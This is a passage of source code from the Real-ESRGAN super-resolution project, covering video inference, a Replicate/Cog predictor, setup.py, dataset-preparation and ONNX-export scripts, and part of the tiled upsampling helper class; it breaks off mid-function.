get_frame(self): if self.input_type.startswith('video'): return self.get_frame_from_stream() else: return self.get_frame_from_list() def close(self): if self.input_type.startswith('video'): self.stream_reader.stdin.close() self.stream_reader.wait() class Writer: def __init__(self, args, audio, height, width, video_save_path, fps): out_width, out_height = int(width * args.outscale), int(height * args.outscale) if out_height > 2160: print('You are generating video that is larger than 4K, which will be very slow due to IO speed.', 'We highly recommend to decrease the outscale(aka, -s).') if audio is not None: self.stream_writer = ( ffmpeg.input('pipe:', format='rawvideo', pix_fmt='bgr24', s=f'{out_width}x{out_height}', framerate=fps).output( audio, video_save_path, pix_fmt='yuv420p', vcodec='libx264', loglevel='error', acodec='copy').overwrite_output().run_async( pipe_stdin=True, pipe_stdout=True, cmd=args.ffmpeg_bin)) else: self.stream_writer = ( ffmpeg.input('pipe:', format='rawvideo', pix_fmt='bgr24', s=f'{out_width}x{out_height}', framerate=fps).output( video_save_path, pix_fmt='yuv420p', vcodec='libx264', loglevel='error').overwrite_output().run_async( pipe_stdin=True, pipe_stdout=True, cmd=args.ffmpeg_bin)) def write_frame(self, frame): frame = frame.astype(np.uint8).tobytes() self.stream_writer.stdin.write(frame) def close(self): self.stream_writer.stdin.close() self.stream_writer.wait() def inference_video(args, video_save_path, device=None, total_workers=1, worker_idx=0): # ---------------------- determine models according to model names ---------------------- # args.model_name = args.model_name.split('.pth')[0] if args.model_name == 'RealESRGAN_x4plus': # x4 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth'] elif args.model_name == 'RealESRNet_x4plus': # x4 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.1/RealESRNet_x4plus.pth'] elif args.model_name == 'RealESRGAN_x4plus_anime_6B': # x4 RRDBNet model with 6 blocks model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4) netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth'] elif args.model_name == 'RealESRGAN_x2plus': # x2 RRDBNet model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2) netscale = 2 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.1/RealESRGAN_x2plus.pth'] elif args.model_name == 'realesr-animevideov3': # x4 VGG-style model (XS size) model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu') netscale = 4 file_url = ['https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-animevideov3.pth'] elif args.model_name == 'realesr-general-x4v3': # x4 VGG-style model (S size) model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=32, upscale=4, act_type='prelu') netscale = 4 file_url = [ 'https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-wdn-x4v3.pth', 'https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-x4v3.pth' ] # ---------------------- determine model paths ---------------------- # model_path = os.path.join('weights', args.model_name + '.pth') if not os.path.isfile(model_path): ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) for url in file_url: # model_path will be updated model_path = load_file_from_url( url=url, model_dir=os.path.join(ROOT_DIR, 'weights'), progress=True, file_name=None) # use dni to control the denoise strength dni_weight = None if args.model_name == 'realesr-general-x4v3' and args.denoise_strength != 1: wdn_model_path = model_path.replace('realesr-general-x4v3', 'realesr-general-wdn-x4v3') model_path = [model_path, wdn_model_path] dni_weight = [args.denoise_strength, 1 - args.denoise_strength] # restorer upsampler = RealESRGANer( scale=netscale, model_path=model_path, dni_weight=dni_weight, model=model, tile=args.tile, tile_pad=args.tile_pad, pre_pad=args.pre_pad, half=not args.fp32, device=device, ) if 'anime' in args.model_name and args.face_enhance: print('face_enhance is not supported in anime models, we turned this option off for you. ' 'if you insist on turning it on, please manually comment the relevant lines of code.') args.face_enhance = False if args.face_enhance: # Use GFPGAN for face enhancement from gfpgan import GFPGANer face_enhancer = GFPGANer( model_path='https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth', upscale=args.outscale, arch='clean', channel_multiplier=2, bg_upsampler=upsampler) # TODO support custom device else: face_enhancer = None reader = Reader(args, total_workers, worker_idx) audio = reader.get_audio() height, width = reader.get_resolution() fps = reader.get_fps() writer = Writer(args, audio, height, width, video_save_path, fps) pbar = tqdm(total=len(reader), unit='frame', desc='inference') while True: img = reader.get_frame() if img is None: break try: if args.face_enhance: _, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True) else: output, _ = upsampler.enhance(img, outscale=args.outscale) except RuntimeError as error: print('Error', error) print('If you encounter CUDA out of memory, try to set --tile with a smaller number.') else: writer.write_frame(output) torch.cuda.synchronize(device) pbar.update(1) reader.close() writer.close() def run(args): args.video_name = osp.splitext(os.path.basename(args.input))[0] video_save_path = osp.join(args.output, f'{args.video_name}_{args.suffix}.mp4') if args.extract_frame_first: tmp_frames_folder = osp.join(args.output, f'{args.video_name}_inp_tmp_frames') os.makedirs(tmp_frames_folder, exist_ok=True) os.system(f'ffmpeg -i {args.input} -qscale:v 1 -qmin 1 -qmax 1 -vsync 0 {tmp_frames_folder}/frame%08d.png') args.input = tmp_frames_folder num_gpus = torch.cuda.device_count() num_process = num_gpus * args.num_process_per_gpu if num_process == 1: inference_video(args, video_save_path) return ctx = torch.multiprocessing.get_context('spawn') pool = ctx.Pool(num_process) os.makedirs(osp.join(args.output, f'{args.video_name}_out_tmp_videos'), exist_ok=True) pbar = tqdm(total=num_process, unit='sub_video', desc='inference') for i in range(num_process): sub_video_save_path = osp.join(args.output, f'{args.video_name}_out_tmp_videos', f'{i:03d}.mp4') pool.apply_async( inference_video, args=(args, sub_video_save_path, torch.device(i % num_gpus), num_process, i), callback=lambda arg: pbar.update(1)) pool.close() pool.join() # combine sub videos # prepare vidlist.txt with open(f'{args.output}/{args.video_name}_vidlist.txt', 'w') as f: for i in range(num_process): f.write(f'file \'{args.video_name}_out_tmp_videos/{i:03d}.mp4\'\n') cmd = [ args.ffmpeg_bin, '-f', 'concat', '-safe', '0', '-i', f'{args.output}/{args.video_name}_vidlist.txt', '-c', 'copy', f'{video_save_path}' ] print(' '.join(cmd)) subprocess.call(cmd) shutil.rmtree(osp.join(args.output, f'{args.video_name}_out_tmp_videos')) if osp.exists(osp.join(args.output, f'{args.video_name}_inp_tmp_videos')): shutil.rmtree(osp.join(args.output, f'{args.video_name}_inp_tmp_videos')) os.remove(f'{args.output}/{args.video_name}_vidlist.txt') def main(): """Inference demo for Real-ESRGAN. It mainly for restoring anime videos. """ parser = argparse.ArgumentParser() parser.add_argument('-i', '--input', type=str, default='inputs', help='Input video, image or folder') parser.add_argument( '-n', '--model_name', type=str, default='realesr-animevideov3', help=('Model names: realesr-animevideov3 | RealESRGAN_x4plus_anime_6B | RealESRGAN_x4plus | RealESRNet_x4plus |' ' RealESRGAN_x2plus | realesr-general-x4v3' 'Default:realesr-animevideov3')) parser.add_argument('-o', '--output', type=str, default='results', help='Output folder') parser.add_argument( '-dn', '--denoise_strength', type=float, default=0.5, help=('Denoise strength. 0 for weak denoise (keep noise), 1 for strong denoise ability. ' 'Only used for the realesr-general-x4v3 model')) parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image') parser.add_argument('--suffix', type=str, default='out', help='Suffix of the restored video') parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing') parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding') parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border') parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face') parser.add_argument( '--fp32', action='store_true', help='Use fp32 precision during inference. Default: fp16 (half precision).') parser.add_argument('--fps', type=float, default=None, help='FPS of the output video') parser.add_argument('--ffmpeg_bin', type=str, default='ffmpeg', help='The path to ffmpeg') parser.add_argument('--extract_frame_first', action='store_true') parser.add_argument('--num_process_per_gpu', type=int, default=1) parser.add_argument( '--alpha_upsampler', type=str, default='realesrgan', help='The upsampler for the alpha channels. Options: realesrgan | bicubic') parser.add_argument( '--ext', type=str, default='auto', help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs') args = parser.parse_args() args.input = args.input.rstrip('/').rstrip('\\') os.makedirs(args.output, exist_ok=True) if mimetypes.guess_type(args.input)[0] is not None and mimetypes.guess_type(args.input)[0].startswith('video'): is_video = True else: is_video = False if is_video and args.input.endswith('.flv'): mp4_path = args.input.replace('.flv', '.mp4') os.system(f'ffmpeg -i {args.input} -codec copy {mp4_path}') args.input = mp4_path if args.extract_frame_first and not is_video: args.extract_frame_first = False run(args) if args.extract_frame_first: tmp_frames_folder = osp.join(args.output, f'{args.video_name}_inp_tmp_frames') shutil.rmtree(tmp_frames_folder) if __name__ == '__main__': main() File: cog_predict.py # flake8: noqa # This file is used for deploying replicate models # running: cog predict -i img=@inputs/00017_gray.png -i version='General - v3' -i scale=2 -i face_enhance=True -i tile=0 # push: cog push r8.im/xinntao/realesrgan import os os.system('pip install gfpgan') os.system('python setup.py develop') import cv2 import shutil import tempfile import torch from basicsr.archs.rrdbnet_arch import RRDBNet from basicsr.archs.srvgg_arch import SRVGGNetCompact from realesrgan.utils import RealESRGANer try: from cog import BasePredictor, Input, Path from gfpgan import GFPGANer except Exception: print('please install cog and realesrgan package') class Predictor(BasePredictor): def setup(self): os.makedirs('output', exist_ok=True) # download weights if not os.path.exists('weights/realesr-general-x4v3.pth'): os.system( 'wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-x4v3.pth -P ./weights' ) if not os.path.exists('weights/GFPGANv1.4.pth'): os.system('wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.4.pth -P ./weights') if not os.path.exists('weights/RealESRGAN_x4plus.pth'): os.system( 'wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth -P ./weights' ) if not os.path.exists('weights/RealESRGAN_x4plus_anime_6B.pth'): os.system( 'wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth -P ./weights' ) if not os.path.exists('weights/realesr-animevideov3.pth'): os.system( 'wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-animevideov3.pth -P ./weights' ) def choose_model(self, scale, version, tile=0): half = True if torch.cuda.is_available() else False if version == 'General - RealESRGANplus': model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) model_path = 'weights/RealESRGAN_x4plus.pth' self.upsampler = RealESRGANer( scale=4, model_path=model_path, model=model, tile=tile, tile_pad=10, pre_pad=0, half=half) elif version == 'General - v3': model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=32, upscale=4, act_type='prelu') model_path = 'weights/realesr-general-x4v3.pth' self.upsampler = RealESRGANer( scale=4, model_path=model_path, model=model, tile=tile, tile_pad=10, pre_pad=0, half=half) elif version == 'Anime - anime6B': model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4) model_path = 'weights/RealESRGAN_x4plus_anime_6B.pth' self.upsampler = RealESRGANer( scale=4, model_path=model_path, model=model, tile=tile, tile_pad=10, pre_pad=0, half=half) elif version == 'AnimeVideo - v3': model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu') model_path = 'weights/realesr-animevideov3.pth' self.upsampler = RealESRGANer( scale=4, model_path=model_path, model=model, tile=tile, tile_pad=10, pre_pad=0, half=half) self.face_enhancer = GFPGANer( model_path='weights/GFPGANv1.4.pth', upscale=scale, arch='clean', channel_multiplier=2, bg_upsampler=self.upsampler) def predict( self, img: Path = Input(description='Input'), version: str = Input( description='RealESRGAN version. Please see [Readme] below for more descriptions', choices=['General - RealESRGANplus', 'General - v3', 'Anime - anime6B', 'AnimeVideo - v3'], default='General - v3'), scale: float = Input(description='Rescaling factor', default=2), face_enhance: bool = Input( description='Enhance faces with GFPGAN. Note that it does not work for anime images/vidoes', default=False), tile: int = Input( description= 'Tile size. Default is 0, that is no tile. When encountering the out-of-GPU-memory issue, please specify it, e.g., 400 or 200', default=0) ) -> Path: if tile <= 100 or tile is None: tile = 0 print(f'img: {img}. version: {version}. scale: {scale}. face_enhance: {face_enhance}. tile: {tile}.') try: extension = os.path.splitext(os.path.basename(str(img)))[1] img = cv2.imread(str(img), cv2.IMREAD_UNCHANGED) if len(img.shape) == 3 and img.shape[2] == 4: img_mode = 'RGBA' elif len(img.shape) == 2: img_mode = None img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) else: img_mode = None h, w = img.shape[0:2] if h < 300: img = cv2.resize(img, (w * 2, h * 2), interpolation=cv2.INTER_LANCZOS4) self.choose_model(scale, version, tile) try: if face_enhance: _, _, output = self.face_enhancer.enhance( img, has_aligned=False, only_center_face=False, paste_back=True) else: output, _ = self.upsampler.enhance(img, outscale=scale) except RuntimeError as error: print('Error', error) print('If you encounter CUDA out of memory, try to set "tile" to a smaller size, e.g., 400.') if img_mode == 'RGBA': # RGBA images should be saved in png format extension = 'png' # save_path = f'output/out.{extension}' # cv2.imwrite(save_path, output) out_path = Path(tempfile.mkdtemp()) / f'out.{extension}' cv2.imwrite(str(out_path), output) except Exception as error: print('global exception: ', error) finally: clean_folder('output') return out_path def clean_folder(folder): for filename in os.listdir(folder): file_path = os.path.join(folder, filename) try: if os.path.isfile(file_path) or os.path.islink(file_path): os.unlink(file_path) elif os.path.isdir(file_path): shutil.rmtree(file_path) except Exception as e: print(f'Failed to delete {file_path}. Reason: {e}') File: setup.py #!/usr/bin/env python from setuptools import find_packages, setup import os import subprocess import time version_file = 'realesrgan/version.py' def readme(): with open('README.md', encoding='utf-8') as f: content = f.read() return content def get_git_hash(): def _minimal_ext_cmd(cmd): # construct minimal environment env = {} for k in ['SYSTEMROOT', 'PATH', 'HOME']: v = os.environ.get(k) if v is not None: env[k] = v # LANGUAGE is used on win32 env['LANGUAGE'] = 'C' env['LANG'] = 'C' env['LC_ALL'] = 'C' out = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env).communicate()[0] return out try: out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD']) sha = out.strip().decode('ascii') except OSError: sha = 'unknown' return sha def get_hash(): if os.path.exists('.git'): sha = get_git_hash()[:7] else: sha = 'unknown' return sha def write_version_py(): content = """# GENERATED VERSION FILE # TIME: {} __version__ = '{}' __gitsha__ = '{}' version_info = ({}) """ sha = get_hash() with open('VERSION', 'r') as f: SHORT_VERSION = f.read().strip() VERSION_INFO = ', '.join([x if x.isdigit() else f'"{x}"' for x in SHORT_VERSION.split('.')]) version_file_str = content.format(time.asctime(), SHORT_VERSION, sha, VERSION_INFO) with open(version_file, 'w') as f: f.write(version_file_str) def get_version(): with open(version_file, 'r') as f: exec(compile(f.read(), version_file, 'exec')) return locals()['__version__'] def get_requirements(filename='requirements.txt'): here = os.path.dirname(os.path.realpath(__file__)) with open(os.path.join(here, filename), 'r') as f: requires = [line.replace('\n', '') for line in f.readlines()] return requires if __name__ == '__main__': write_version_py() setup( name='realesrgan', version=get_version(), description='Real-ESRGAN aims at developing Practical Algorithms for General Image Restoration', long_description=readme(), long_description_content_type='text/markdown', author='Xintao Wang', author_email='[email protected]', keywords='computer vision, pytorch, image restoration, super-resolution, esrgan, real-esrgan', url='https://github.com/xinntao/Real-ESRGAN', include_package_data=True, packages=find_packages(exclude=('options', 'datasets', 'experiments', 'results', 'tb_logger', 'wandb')), classifiers=[ 'Development Status :: 4 - Beta', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', ], license='BSD-3-Clause License', setup_requires=['cython', 'numpy'], install_requires=get_requirements(), zip_safe=False) File: scripts/generate_meta_info_pairdata.py import argparse import glob import os def main(args): txt_file = open(args.meta_info, 'w') # sca images img_paths_gt = sorted(glob.glob(os.path.join(args.input[0], '*'))) img_paths_lq = sorted(glob.glob(os.path.join(args.input[1], '*'))) assert len(img_paths_gt) == len(img_paths_lq), ('GT folder and LQ folder should have the same length, but got ' f'{len(img_paths_gt)} and {len(img_paths_lq)}.') for img_path_gt, img_path_lq in zip(img_paths_gt, img_paths_lq): # get the relative paths img_name_gt = os.path.relpath(img_path_gt, args.root[0]) img_name_lq = os.path.relpath(img_path_lq, args.root[1]) print(f'{img_name_gt}, {img_name_lq}') txt_file.write(f'{img_name_gt}, {img_name_lq}\n') if __name__ == '__main__': """This script is used to generate meta info (txt file) for paired images. """ parser = argparse.ArgumentParser() parser.add_argument( '--input', nargs='+', default=['datasets/DF2K/DIV2K_train_HR_sub', 'datasets/DF2K/DIV2K_train_LR_bicubic_X4_sub'], help='Input folder, should be [gt_folder, lq_folder]') parser.add_argument('--root', nargs='+', default=[None, None], help='Folder root, will use the ') parser.add_argument( '--meta_info', type=str, default='datasets/DF2K/meta_info/meta_info_DIV2K_sub_pair.txt', help='txt path for meta info') args = parser.parse_args() assert len(args.input) == 2, 'Input folder should have two elements: gt folder and lq folder' assert len(args.root) == 2, 'Root path should have two elements: root for gt folder and lq folder' os.makedirs(os.path.dirname(args.meta_info), exist_ok=True) for i in range(2): if args.input[i].endswith('/'): args.input[i] = args.input[i][:-1] if args.root[i] is None: args.root[i] = os.path.dirname(args.input[i]) main(args) File: scripts/generate_meta_info.py import argparse import cv2 import glob import os def main(args): txt_file = open(args.meta_info, 'w') for folder, root in zip(args.input, args.root): img_paths = sorted(glob.glob(os.path.join(folder, '*'))) for img_path in img_paths: status = True if args.check: # read the image once for check, as some images may have errors try: img = cv2.imread(img_path) except (IOError, OSError) as error: print(f'Read {img_path} error: {error}') status = False if img is None: status = False print(f'Img is None: {img_path}') if status: # get the relative path img_name = os.path.relpath(img_path, root) print(img_name) txt_file.write(f'{img_name}\n') if __name__ == '__main__': """Generate meta info (txt file) for only Ground-Truth images. It can also generate meta info from several folders into one txt file. """ parser = argparse.ArgumentParser() parser.add_argument( '--input', nargs='+', default=['datasets/DF2K/DF2K_HR', 'datasets/DF2K/DF2K_multiscale'], help='Input folder, can be a list') parser.add_argument( '--root', nargs='+', default=['datasets/DF2K', 'datasets/DF2K'], help='Folder root, should have the length as input folders') parser.add_argument( '--meta_info', type=str, default='datasets/DF2K/meta_info/meta_info_DF2Kmultiscale.txt', help='txt path for meta info') parser.add_argument('--check', action='store_true', help='Read image to check whether it is ok') args = parser.parse_args() assert len(args.input) == len(args.root), ('Input folder and folder root should have the same length, but got ' f'{len(args.input)} and {len(args.root)}.') os.makedirs(os.path.dirname(args.meta_info), exist_ok=True) main(args) File: scripts/extract_subimages.py import argparse import cv2 import numpy as np import os import sys from basicsr.utils import scandir from multiprocessing import Pool from os import path as osp from tqdm import tqdm def main(args): """A multi-thread tool to crop large images to sub-images for faster IO. opt (dict): Configuration dict. It contains: n_thread (int): Thread number. compression_level (int): CV_IMWRITE_PNG_COMPRESSION from 0 to 9. A higher value means a smaller size and longer compression time. Use 0 for faster CPU decompression. Default: 3, same in cv2. input_folder (str): Path to the input folder. save_folder (str): Path to save folder. crop_size (int): Crop size. step (int): Step for overlapped sliding window. thresh_size (int): Threshold size. Patches whose size is lower than thresh_size will be dropped. Usage: For each folder, run this script. Typically, there are GT folder and LQ folder to be processed for DIV2K dataset. After process, each sub_folder should have the same number of subimages. Remember to modify opt configurations according to your settings. """ opt = {} opt['n_thread'] = args.n_thread opt['compression_level'] = args.compression_level opt['input_folder'] = args.input opt['save_folder'] = args.output opt['crop_size'] = args.crop_size opt['step'] = args.step opt['thresh_size'] = args.thresh_size extract_subimages(opt) def extract_subimages(opt): """Crop images to subimages. Args: opt (dict): Configuration dict. It contains: input_folder (str): Path to the input folder. save_folder (str): Path to save folder. n_thread (int): Thread number. """ input_folder = opt['input_folder'] save_folder = opt['save_folder'] if not osp.exists(save_folder): os.makedirs(save_folder) print(f'mkdir {save_folder} ...') else: print(f'Folder {save_folder} already exists. Exit.') sys.exit(1) # scan all images img_list = list(scandir(input_folder, full_path=True)) pbar = tqdm(total=len(img_list), unit='image', desc='Extract') pool = Pool(opt['n_thread']) for path in img_list: pool.apply_async(worker, args=(path, opt), callback=lambda arg: pbar.update(1)) pool.close() pool.join() pbar.close() print('All processes done.') def worker(path, opt): """Worker for each process. Args: path (str): Image path. opt (dict): Configuration dict. It contains: crop_size (int): Crop size. step (int): Step for overlapped sliding window. thresh_size (int): Threshold size. Patches whose size is lower than thresh_size will be dropped. save_folder (str): Path to save folder. compression_level (int): for cv2.IMWRITE_PNG_COMPRESSION. Returns: process_info (str): Process information displayed in progress bar. """ crop_size = opt['crop_size'] step = opt['step'] thresh_size = opt['thresh_size'] img_name, extension = osp.splitext(osp.basename(path)) # remove the x2, x3, x4 and x8 in the filename for DIV2K img_name = img_name.replace('x2', '').replace('x3', '').replace('x4', '').replace('x8', '') img = cv2.imread(path, cv2.IMREAD_UNCHANGED) h, w = img.shape[0:2] h_space = np.arange(0, h - crop_size + 1, step) if h - (h_space[-1] + crop_size) > thresh_size: h_space = np.append(h_space, h - crop_size) w_space = np.arange(0, w - crop_size + 1, step) if w - (w_space[-1] + crop_size) > thresh_size: w_space = np.append(w_space, w - crop_size) index = 0 for x in h_space: for y in w_space: index += 1 cropped_img = img[x:x + crop_size, y:y + crop_size, ...] cropped_img = np.ascontiguousarray(cropped_img) cv2.imwrite( osp.join(opt['save_folder'], f'{img_name}_s{index:03d}{extension}'), cropped_img, [cv2.IMWRITE_PNG_COMPRESSION, opt['compression_level']]) process_info = f'Processing {img_name} ...' return process_info if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', type=str, default='datasets/DF2K/DF2K_HR', help='Input folder') parser.add_argument('--output', type=str, default='datasets/DF2K/DF2K_HR_sub', help='Output folder') parser.add_argument('--crop_size', type=int, default=480, help='Crop size') parser.add_argument('--step', type=int, default=240, help='Step for overlapped sliding window') parser.add_argument( '--thresh_size', type=int, default=0, help='Threshold size. Patches whose size is lower than thresh_size will be dropped.') parser.add_argument('--n_thread', type=int, default=20, help='Thread number.') parser.add_argument('--compression_level', type=int, default=3, help='Compression level') args = parser.parse_args() main(args) File: scripts/pytorch2onnx.py import argparse import torch import torch.onnx from basicsr.archs.rrdbnet_arch import RRDBNet def main(args): # An instance of the model model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4) if args.params: keyname = 'params' else: keyname = 'params_ema' model.load_state_dict(torch.load(args.input)[keyname]) # set the train mode to false since we will only run the forward pass. model.train(False) model.cpu().eval() # An example input x = torch.rand(1, 3, 64, 64) # Export the model with torch.no_grad(): torch_out = torch.onnx._export(model, x, args.output, opset_version=11, export_params=True) print(torch_out.shape) if __name__ == '__main__': """Convert pytorch model to onnx models""" parser = argparse.ArgumentParser() parser.add_argument( '--input', type=str, default='experiments/pretrained_models/RealESRGAN_x4plus.pth', help='Input model path') parser.add_argument('--output', type=str, default='realesrgan-x4.onnx', help='Output onnx path') parser.add_argument('--params', action='store_false', help='Use params instead of params_ema') args = parser.parse_args() main(args) File: scripts/generate_multiscale_DF2K.py import argparse import glob import os from PIL import Image def main(args): # For DF2K, we consider the following three scales, # and the smallest image whose shortest edge is 400 scale_list = [0.75, 0.5, 1 / 3] shortest_edge = 400 path_list = sorted(glob.glob(os.path.join(args.input, '*'))) for path in path_list: print(path) basename = os.path.splitext(os.path.basename(path))[0] img = Image.open(path) width, height = img.size for idx, scale in enumerate(scale_list): print(f'\t{scale:.2f}') rlt = img.resize((int(width * scale), int(height * scale)), resample=Image.LANCZOS) rlt.save(os.path.join(args.output, f'{basename}T{idx}.png')) # save the smallest image which the shortest edge is 400 if width < height: ratio = height / width width = shortest_edge height = int(width * ratio) else: ratio = width / height height = shortest_edge width = int(height * ratio) rlt = img.resize((int(width), int(height)), resample=Image.LANCZOS) rlt.save(os.path.join(args.output, f'{basename}T{idx+1}.png')) if __name__ == '__main__': """Generate multi-scale versions for GT images with LANCZOS resampling. It is now used for DF2K dataset (DIV2K + Flickr 2K) """ parser = argparse.ArgumentParser() parser.add_argument('--input', type=str, default='datasets/DF2K/DF2K_HR', help='Input folder') parser.add_argument('--output', type=str, default='datasets/DF2K/DF2K_multiscale', help='Output folder') args = parser.parse_args() os.makedirs(args.output, exist_ok=True) main(args) File: realesrgan/__init__.py # flake8: noqa from .archs import * from .data import * from .models import * from .utils import * from .version import * File: realesrgan/utils.py import cv2 import math import numpy as np import os import queue import threading import torch from basicsr.utils.download_util import load_file_from_url from torch.nn import functional as F ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) class RealESRGANer(): """A helper class for upsampling images with RealESRGAN. Args: scale (int): Upsampling scale factor used in the networks. It is usually 2 or 4. model_path (str): The path to the pretrained model. It can be urls (will first download it automatically). model (nn.Module): The defined network. Default: None. tile (int): As too large images result in the out of GPU memory issue, so this tile option will first crop input images into tiles, and then process each of them. Finally, they will be merged into one image. 0 denotes for do not use tile. Default: 0. tile_pad (int): The pad size for each tile, to remove border artifacts. Default: 10. pre_pad (int): Pad the input images to avoid border artifacts. Default: 10. half (float): Whether to use half precision during inference. Default: False. """ def __init__(self, scale, model_path, dni_weight=None, model=None, tile=0, tile_pad=10, pre_pad=10, half=False, device=None, gpu_id=None): self.scale = scale self.tile_size = tile self.tile_pad = tile_pad self.pre_pad = pre_pad self.mod_scale = None self.half = half # initialize model if gpu_id: self.device = torch.device( f'cuda:{gpu_id}' if torch.cuda.is_available() else 'cpu') if device is None else device else: self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device is None else device if isinstance(model_path, list): # dni assert len(model_path) == len(dni_weight), 'model_path and dni_weight should have the save length.' loadnet = self.dni(model_path[0], model_path[1], dni_weight) else: # if the model_path starts with https, it will first download models to the folder: weights if model_path.startswith('https://'): model_path = load_file_from_url( url=model_path, model_dir=os.path.join(ROOT_DIR, 'weights'), progress=True, file_name=None) loadnet = torch.load(model_path, map_location=torch.device('cpu')) # prefer to use params_ema if 'params_ema' in loadnet: keyname = 'params_ema' else: keyname = 'params' model.load_state_dict(loadnet[keyname], strict=True) model.eval() self.model = model.to(self.device) if self.half: self.model = self.model.half() def dni(self, net_a, net_b, dni_weight, key='params', loc='cpu'): """Deep network interpolation. ``Paper: Deep Network Interpolation for Continuous Imagery Effect Transition`` """ net_a = torch.load(net_a, map_location=torch.device(loc)) net_b = torch.load(net_b, map_location=torch.device(loc)) for k, v_a in net_a[key].items(): net_a[key][k] = dni_weight[0] * v_a + dni_weight[1] * net_b[key][k] return net_a def pre_process(self, img): """Pre-process, such as pre-pad and mod pad, so that the images can be divisible """ img = torch.from_numpy(np.transpose(img, (2, 0, 1))).float() self.img = img.unsqueeze(0).to(self.device) if self.half: self.img = self.img.half() # pre_pad if self.pre_pad != 0: self.img = F.pad(self.img, (0, self.pre_pad, 0, self.pre_pad), 'reflect') # mod pad for divisible borders if self.scale == 2: self.mod_scale = 2 elif self.scale == 1: self.mod_scale = 4 if self.mod_scale is not None: self.mod_pad_h, self.mod_pad_w = 0, 0 _, _, h, w = self.img.size() if (h % self.mod_scale != 0): self.mod_pad_h = (self.mod_scale - h % self.mod_scale) if (w % self.mod_scale != 0): self.mod_pad_w = (self.mod_scale - w % self.mod_scale) self.img = F.pad(self.img, (0, self.mod_pad_w, 0, self.mod_pad_h), 'reflect') def process(self): # model inference self.output = self.model(self.img) def tile_process(self): """It will first crop input images to tiles, and then process each tile. Finally, all the processed tiles are merged into one images. Modified from: https://github.com/ata4/esrgan-launcher """ batch, channel, height, width = self.img.shape output_height = height * self.scale output_width = width * self.scale output_shape = (batch, channel, output_height, output_width) # start with black image self.output = self.img.new_zeros(output_shape) tiles_x = math.ceil(width / self.tile_size) tiles_y = math.ceil(height / self.tile_size) # loop over all tiles for y in range(tiles_y): for x in range(tiles_x): # extract tile from input image ofs_x = x * self.tile_size ofs_y = y * self.tile_size # input tile area on total image input_start_x = ofs_x input_end_x = min(ofs_x + self.tile_size, width) input_start_y = ofs_y input_end_y = min(ofs_y + self.tile_size, height) # input tile area on total image with padding input_start_x_pad = max(input_start_x - self.tile_pad, 0) input_end_x_pad = min(input_end_x + self.tile_pad, width) input_start_y_pad = max(input_start_y - self.tile_pad, 0) input_end_y_pad = min(input_end_y + self.tile_pad, height) # input tile dimensions input_tile_width = input_end_x - input_start_x input_tile_height = input_end_y - input_start_y tile_idx = y * tiles_x + x + 1 input_tile = self.img[:, :, input_start_y_pad:input_end_y_pad, input_start_x_pad:input_end_x_pad] # upscale tile try: with torch.no_grad(): output_tile = self.model(input_tile) except RuntimeError as error: print('Error', error) print(f'\tTile {tile_idx}/{tiles_x * tiles_y}') # output tile area on total image output_start_x = input_start_x * self.scale output_end_x = input_end_x * self.scale output_start_y = input_start_y * self.scale output_end_y = input_end_y * self.scale # output tile area without padding output_start_x_tile = (input_start_x - input_start_x_pad) * self.scale output_end_x_tile = output_start_x_tile + input_tile_width * self.scale output_start_y_tile = (input_start_y - input_start_y_pad) * self.scale output_end_y_tile = output_start_y_tile + input_tile_height * self.scale # put tile into output image self.output[:, :, output_start_y:output_end_y, 